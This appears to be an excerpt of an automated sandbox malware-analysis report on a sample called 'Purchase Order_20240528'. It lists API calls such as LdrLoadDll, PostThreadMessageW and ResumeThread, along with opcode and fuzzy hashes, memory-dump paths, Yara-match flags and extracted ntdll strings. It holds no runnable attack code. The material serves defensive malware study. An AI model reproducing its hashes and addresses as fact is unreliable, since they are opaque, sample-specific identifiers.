                                  • Instruction ID: c3c6239c46a06f394667623170530b526dc74b19dbe2cc0f8eb0b5a50e8cc877
                                  • Opcode Fuzzy Hash: e64c31e262a91fcce6677f45d79a7517e774cc35a94cc7d1003267b9f7a5a46b
                                  • Instruction Fuzzy Hash: 8311E3B5800389EFDB60DF99D844BDEBBF8EB49320F208459E568A7240C3B5A554CFA1
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2088360959.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6d10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: af26de5e1353a21bd91c0f515986019040055a7de6b179edc50cbd7f3609d6cf
                                  • Instruction ID: 4b06d3356338b6fe5ab78ffa34193f77df19deb30c244b7a85d9ce7612419970
                                  • Opcode Fuzzy Hash: af26de5e1353a21bd91c0f515986019040055a7de6b179edc50cbd7f3609d6cf
                                  • Instruction Fuzzy Hash: 211128B19003498FDB20DFAAD4457DEFBF5AF88724F248419D519A7240CBB9A540CB95
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00E1B73E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2084939188.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: 797ae5c59971de8ca09f44b7827cff75b7e9ee1bbff23b2048c3f8c53d27eb8c
                                  • Instruction ID: f1ef3da39d8a15a2b158f41bcf0dc8373d2cbfdb8125ca6200e8523bede94168
                                  • Opcode Fuzzy Hash: 797ae5c59971de8ca09f44b7827cff75b7e9ee1bbff23b2048c3f8c53d27eb8c
                                  • Instruction Fuzzy Hash: 0C110FB6C002498FDB10CF9AD444ADEFBF5AB88324F10852AD428B7250C3B9A545CFA1
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00E1B73E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2084939188.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: 3afe0479fec69d65302e992758c8afd4f70b0f0462c0a287cd021f13fb9873d2
                                  • Instruction ID: ad3dc7659a0386800fda2646593e36ca9ec4000400c6bfd4854d1e2add57feb3
                                  • Opcode Fuzzy Hash: 3afe0479fec69d65302e992758c8afd4f70b0f0462c0a287cd021f13fb9873d2
                                  • Instruction Fuzzy Hash: 12110FB6C002498FDB10CF9AD444ADEFBF5AB88324F10852AD418B7250C3B9A545CFA1
                                  APIs
                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 06D16F85
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2088360959.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6d10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: dbe87c88c0608bd95cce223fa6f9545fe09bfbf300521188a19b76555b6605c9
                                  • Instruction ID: ebe4b0885c6513afaf65f1c4aa0805900d28856a3442d31f86229c5fc302650a
                                  • Opcode Fuzzy Hash: dbe87c88c0608bd95cce223fa6f9545fe09bfbf300521188a19b76555b6605c9
                                  • Instruction Fuzzy Hash: 721106B5804349DFDB50DF99D444BDEBBF8EB48324F10845AE558A7340C3B5A954CFA1

                                  Execution Graph

                                  Execution Coverage:1.1%
                                  Dynamic/Decrypted Code Coverage:4.7%
                                  Signature Coverage:4.7%
                                  Total number of Nodes:149
                                  Total number of Limit Nodes:16

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 406 42b543-42b57f call 404ae3 call 42c5b3 NtClose
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2209421933.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_401000_Purchase Order_20240528.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: e6daa042e966176be579df3f9ff239f27a5e42b93ad2f04772bb9893fb58ab0a
                                  • Instruction ID: 7baa626187fcc9ed4b9f1308d01cd81d2364a9ef1d1c3a9d280c108a6a831b1c
                                  • Opcode Fuzzy Hash: e6daa042e966176be579df3f9ff239f27a5e42b93ad2f04772bb9893fb58ab0a
                                  • Instruction Fuzzy Hash: 56E04F352502547BD510EA5ADC41FDB775CDBC5754F40411AFA0867245C6B1BA0087E4
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 5eb9814fd03e2a09ce451630871a4541044afca3725e6102394a06c7b8c539b8
                                  • Instruction ID: 119f454aec3e1f0769b613b9e84411ff55839c1fcea223a15ef3740b23d64b2b
                                  • Opcode Fuzzy Hash: 5eb9814fd03e2a09ce451630871a4541044afca3725e6102394a06c7b8c539b8
                                  • Instruction Fuzzy Hash: E490026160240003410575584814657401E97E0201B55C121F5018690EC52589927225
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 7c851b553deff2e51e687cfeb96a88923f544fd0e06972dd9bcb4ebfab49ed86
                                  • Instruction ID: 49bc0e817323dcb92121d463c592645275d51ac61b7b22abb9bbe65dbf089442
                                  • Opcode Fuzzy Hash: 7c851b553deff2e51e687cfeb96a88923f544fd0e06972dd9bcb4ebfab49ed86
                                  • Instruction Fuzzy Hash: 2090023160140413D11175584904747001D97D0241F95C512B4428658ED6568A53B221
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: d5455b5eb3dbf81eda3393412918eb38faed49a39e2ab225edd05a96683f64d9
                                  • Instruction ID: a5faf4f3e1ada70566cc8fd050fd4045ae70dadfc26c755d57589f6cf05efb5e
                                  • Opcode Fuzzy Hash: d5455b5eb3dbf81eda3393412918eb38faed49a39e2ab225edd05a96683f64d9
                                  • Instruction Fuzzy Hash: 2E90023160148802D1107558880478B001997D0301F59C511B8428758EC69589927221
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: b390988428a2ba8ea373c9417743876ba929bddfb09a57d115ea201bfda7e2cd
                                  • Instruction ID: 6b0abfa080f58805b4afb7f003ea9affff3d96b21fa665befba6a9d8f8c98f6a
                                  • Opcode Fuzzy Hash: b390988428a2ba8ea373c9417743876ba929bddfb09a57d115ea201bfda7e2cd
                                  • Instruction Fuzzy Hash: 9A900231A0550402D10075584914747101997D0201F65C511B4428668EC7958A5276A2

                                  Control-flow Graph

                                  APIs
                                  • PostThreadMessageW.USER32(7--93mK-,00000111,00000000,00000000), ref: 004140AA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2209421933.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_401000_Purchase Order_20240528.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID: 7--93mK-$7--93mK-
                                  • API String ID: 1836367815-3783969520
                                  • Opcode ID: 3a8e7344caa9dce6007bb169546918b974dd2587ac9bc654b05d3ffd82c4c9ec
                                  • Instruction ID: ef2cd7333192803d24dfae15859473f3f85994460fa10dd3f17fd208c4f7ddc2
                                  • Opcode Fuzzy Hash: 3a8e7344caa9dce6007bb169546918b974dd2587ac9bc654b05d3ffd82c4c9ec
                                  • Instruction Fuzzy Hash: 6711E9B1D0025C7ADB10ABD59C81DEFBB7CDF84398F008069FA1467241D2794E064BF9

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 15 414033-41407b call 42d463 call 42de73 call 4179d3 call 404a53 24 414081-41409d 15->24 25 41407c call 4247c3 15->25 26 4140bd-4140c3 24->26 27 41409f-4140ae PostThreadMessageW 24->27 25->24 27->26 28 4140b0-4140ba 27->28 28->26
                                  APIs
                                  • PostThreadMessageW.USER32(7--93mK-,00000111,00000000,00000000), ref: 004140AA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2209421933.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_401000_Purchase Order_20240528.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID: 7--93mK-$7--93mK-
                                  • API String ID: 1836367815-3783969520
                                  • Opcode ID: 7d79e5cd185e6ae716d6c74e02a54555389d0ab3d77fe80dd74c53837e05fc6d
                                  • Instruction ID: 384a6e8845f89a293fddf371e3ca3a9a005896865627af5530ae2eee72214b65
                                  • Opcode Fuzzy Hash: 7d79e5cd185e6ae716d6c74e02a54555389d0ab3d77fe80dd74c53837e05fc6d
                                  • Instruction Fuzzy Hash: 8601C8B1D0015C7AEB10AAD19C81DEFBB7CDF80798F04806AFA1467141D67C4E064BF9

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 29 41401f-414021 30 414081-41409d 29->30 31 414023-41402a 29->31 32 4140bd-4140c3 30->32 33 41409f-4140ae PostThreadMessageW 30->33 33->32 34 4140b0-4140ba 33->34 34->32
                                  APIs
                                  • PostThreadMessageW.USER32(7--93mK-,00000111,00000000,00000000), ref: 004140AA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2209421933.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_401000_Purchase Order_20240528.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID: 7--93mK-$7--93mK-
                                  • API String ID: 1836367815-3783969520
                                  • Opcode ID: 24abfe0573eac7b940e217813fcc710d0e29d24c1cb178ef7aac01b434065fba
                                  • Instruction ID: 413ca1c7bc6544747e0d95237f84621517fbf5ed2e267f46896169ec2b8f9604
                                  • Opcode Fuzzy Hash: 24abfe0573eac7b940e217813fcc710d0e29d24c1cb178ef7aac01b434065fba
                                  • Instruction Fuzzy Hash: 9EF0A777E4014C769B108AD96C828EEFBBCDE94364F0081A7EE18E7200D2394D424BA6

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 380 4179d3-4179fc call 42e0c3 383 417a02-417a10 call 42e5e3 380->383 384 4179fe-417a01 380->384 387 417a20-417a31 call 42ca93 383->387 388 417a12-417a1d call 42e883 383->388 394 417a33-417a47 LdrLoadDll 387->394 395 417a4a-417a4d 387->395 388->387 394->395
                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417A45
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2209421933.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_401000_Purchase Order_20240528.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: c637b0a5039fee39120ea626e6d6813652200ddffb7808a4ed43236f6d148d2f
                                  • Instruction ID: bfa767b54ff4edb4b9491ed2217fcb575d9024015dfba4bbcfc37fa648dcb672
                                  • Opcode Fuzzy Hash: c637b0a5039fee39120ea626e6d6813652200ddffb7808a4ed43236f6d148d2f
                                  • Instruction Fuzzy Hash: C9015EB1E4020DABDF10DBE1DC42FDEB3789F14308F0041AAE90897241F635EB448B95

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 396 42b853-42b897 call 404ae3 call 42c5b3 RtlAllocateHeap
                                  APIs
                                  • RtlAllocateHeap.NTDLL(?,0041E19B,?,?,00000000,?,0041E19B,?,?,?), ref: 0042B892
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2209421933.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_401000_Purchase Order_20240528.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: 8fc0493a6e8bee40a610767ea931887b664697431e711198148b16c4f16402e4
                                  • Instruction ID: f61b25608699206a629d7f99839a3876da92859892d862afadf7fbbe1cce9547
                                  • Opcode Fuzzy Hash: 8fc0493a6e8bee40a610767ea931887b664697431e711198148b16c4f16402e4
                                  • Instruction Fuzzy Hash: 76E06DB23002157FCA10EE5AEC41F9B77ACEFC5710F00401AF909A7241CAB0BA108BB9

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 401 42b8a3-42b8e4 call 404ae3 call 42c5b3 RtlFreeHeap
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,00000ADC,00000007,00000000,00000004,00000000,004172BB,000000F4,?,?,?,?,?), ref: 0042B8DF
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2209421933.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_401000_Purchase Order_20240528.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID:
                                  • API String ID: 3298025750-0
                                  • Opcode ID: ebd85f2aa228cf2bf1eefa713117c3bd037453a5f3ab9d526bc395588c7853d4
                                  • Instruction ID: 6f5796991c5eb4dfc6a81e2c3c15b6c012848cc12606d7a9283871a648ca7288
                                  • Opcode Fuzzy Hash: ebd85f2aa228cf2bf1eefa713117c3bd037453a5f3ab9d526bc395588c7853d4
                                  • Instruction Fuzzy Hash: A4E065B6614214BBCA10EE5AEC41F9B77ACEFC8750F00401AFA18A7341C670BA108BB8

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 411 42b8f3-42b92f call 404ae3 call 42c5b3 ExitProcess
                                  APIs
                                  • ExitProcess.KERNEL32(?,00000000,?,?,4326212F,?,?,4326212F), ref: 0042B92A
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2209421933.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_401000_Purchase Order_20240528.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID:
                                  • API String ID: 621844428-0
                                  • Opcode ID: 6139245699a32d14016756140353c14a79df01f78cdaf14cdd69df58b113f924
                                  • Instruction ID: f961bc45a0b5c8375fa7d540dbc00f60224546b7d74deae934d82caa4fcf49e1
                                  • Opcode Fuzzy Hash: 6139245699a32d14016756140353c14a79df01f78cdaf14cdd69df58b113f924
                                  • Instruction Fuzzy Hash: 01E04F762002147BC520EA5ADC41F9B775CDBC5724F40401AFB4867245CA71F95087F8
                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417A45
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2209421933.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_401000_Purchase Order_20240528.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: 9a64fc1e66d337bad59ad5524a175d7d14ceeaed205581d9aa7de55f04977df5
                                  • Instruction ID: b182473a06fdb04f11debc91ba2fcb4fe64166369566d50de388a4a8d297d1d7
                                  • Opcode Fuzzy Hash: 9a64fc1e66d337bad59ad5524a175d7d14ceeaed205581d9aa7de55f04977df5
                                  • Instruction Fuzzy Hash: E9E04675A4400EAEDB00CBD4D892FDDB7B4AF54308F048296E908DB240E634EB448B59
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 5757b8eeb315fced8404229affb36b42493b773890ecf5f22d5d392d1da97638
                                  • Instruction ID: 0ecff2aca33659c0c3924ebc81bfa6ca81043a41d1ddbae41014f68c756c0c9a
                                  • Opcode Fuzzy Hash: 5757b8eeb315fced8404229affb36b42493b773890ecf5f22d5d392d1da97638
                                  • Instruction Fuzzy Hash: B4B09B71D019D5C5DA51E7644E08717791477D0701F15C165E2034751F4738C1D1F675
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-2160512332
                                  • Opcode ID: f623e7b58054c7931f14334ff8ce8173543e31d0e1c54f1e7de31f2169a125d7
                                  • Instruction ID: 8250cbb38c769c1152cab639821971c4973feb0ac4e95b2fb097ee145ada4182
                                  • Opcode Fuzzy Hash: f623e7b58054c7931f14334ff8ce8173543e31d0e1c54f1e7de31f2169a125d7
                                  • Instruction Fuzzy Hash: 8A928C71604342AFE721CE29CC90B6BBBE9BB84754F04492DFA95DB390D770E844CB92
                                  Strings
                                  • Thread identifier, xrefs: 0165553A
                                  • Invalid debug info address of this critical section, xrefs: 016554B6
                                  • Critical section debug info address, xrefs: 0165541F, 0165552E
                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016554E2
                                  • Thread is in a state in which it cannot own a critical section, xrefs: 01655543
                                  • Critical section address., xrefs: 01655502
                                  • Critical section address, xrefs: 01655425, 016554BC, 01655534
                                  • Address of the debug info found in the active list., xrefs: 016554AE, 016554FA
                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0165540A, 01655496, 01655519
                                  • undeleted critical section in freed memory, xrefs: 0165542B
                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016554CE
                                  • 8, xrefs: 016552E3
                                  • corrupted critical section, xrefs: 016554C2
                                  • double initialized or corrupted critical section, xrefs: 01655508
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                  • API String ID: 0-2368682639
                                  • Opcode ID: 8b115cffb62d07f2c5d525b77cd8486c02ea06894ff97e578f5f24c8dc5b1445
                                  • Instruction ID: 454d64714f95e5f71af499e13c1519b3a594014a5269c1a2a38d60f41322fcb8
                                  • Opcode Fuzzy Hash: 8b115cffb62d07f2c5d525b77cd8486c02ea06894ff97e578f5f24c8dc5b1445
                                  • Instruction Fuzzy Hash: 2681ACB0A01359EFDB60CF99CC44BAEBBB9BB49B04F14411DF905BB241D3B5A941CB90
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                  • API String ID: 3446177414-1700792311
                                  • Opcode ID: 959e306c4a6cfe6e6837945b16bb2ac65d9afd3183ddedea40888b7c438de3f5
                                  • Instruction ID: c4b3bd2116989e9ad52b71eea702bb38d4bcaf7b79733777156fd5a1a7cbf69e
                                  • Opcode Fuzzy Hash: 959e306c4a6cfe6e6837945b16bb2ac65d9afd3183ddedea40888b7c438de3f5
                                  • Instruction Fuzzy Hash: 66D1CA31A01686EFDF22DF68CC40AA9BBFAFF8A710F098059F5459B752C7349981CB54
                                  Strings
                                  • RtlpResolveAssemblyStorageMapEntry, xrefs: 0165261F
                                  • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01652412
                                  • @, xrefs: 0165259B
                                  • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01652602
                                  • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 016524C0
                                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01652506
                                  • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01652624
                                  • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 016522E4
                                  • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01652409
                                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 016525EB
                                  • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01652498
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                  • API String ID: 0-4009184096
                                  • Opcode ID: 6ab01f1485abc08f47b2e41210f71233f26d810d12aad5a2dbf0499d5e01d59f
                                  • Instruction ID: a1b577d40bf9a0c7e8848069b1837d2e9816e8248e3a0c96246fe22db5828813
                                  • Opcode Fuzzy Hash: 6ab01f1485abc08f47b2e41210f71233f26d810d12aad5a2dbf0499d5e01d59f
                                  • Instruction Fuzzy Hash: 96027FB1D002299FDB61DB54CC90BAAB7B8AF54704F0441DEEB09A7241EB309F85CF69
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                  • API String ID: 0-2515994595
